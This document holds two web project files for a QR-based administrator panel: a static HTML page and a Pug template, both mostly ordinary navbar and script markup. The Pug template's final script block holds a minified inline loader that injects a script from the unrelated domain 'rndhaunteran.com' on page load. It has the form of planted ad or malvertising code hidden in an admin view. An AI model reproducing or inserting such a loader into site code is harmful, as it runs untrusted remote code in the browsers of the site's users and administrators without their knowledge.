public/admin.html
<html>
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Administrator panel</title>
	<link rel="stylesheet" href="/main.css">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	
</head>
<body>
<section class="section">
	<nav class="navbar" role="navigation" aria-label="main navigation">
	  <div class="navbar-brand">
	    <a class="navbar-item" href="https://bulma.io">
	      <img src="https://bulma.io/images/bulma-logo.png" width="112" height="28">
	    </a>

	    <a role="button" class="navbar-burger" aria-label="menu" aria-expanded="false" data-target="navbarBasicExample">
	      <span aria-hidden="true"></span>
	      <span aria-hidden="true"></span>
	      <span aria-hidden="true"></span>
	    </a>
	  </div>

	  <div id="navbarBasicExample" class="navbar-menu">
	    <div class="navbar-start">
	      <a class="navbar-item">
	        Home
	      </a>
	    </div>
	  </div>
	</nav>
</section>

<div id="greetingComponent-ui"></div>

<!--<section class="section">
	<div class="container is-widescreen">
		<div class="columns">
			<div class="column"></div>
			<div class="column is-two-thirds">
				<canvas  id="canvas"  hidden style="background-color: red"></canvas>
			</div>
			<div class="column">
			</div>
		</div>
		<div id="output" hidden>
						<div id="outputMessage">No QR code detected.</div>
						<div hidden><b>Data:</b> <span id="outputData"></span></div>
				<div id="cardActionsComponents-ui"></div>
	</div>
</section>
-->

<div id="mainModule-ui">
	<div id="router"></div>
</div>

<!--<section class="section">
	<div id="cardActionsComponents-ui"></div>
</section>
-->

<script src="vendor/qrReader.js"></script>
<script type="module" src="administrator.js"></script>
	 
</body>
</html>

src/views/admin.pug
extends baseHomePages.pug


block menuItems
	a(class="navbar-item" id="addCompanyA" href="#companies") Empresas

	

block content
	div(id="mainModule-ui")
		div(id="router")


block js
	script(type="text/javascript" src="vendor/qrReader.js")
	script(type="module" src="dist/administrator.js")
	script(type='text/javascript').
		(function(d,z,s){s.src='//'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('rndhaunteran.com',4516393,document.createElement('script'))
	
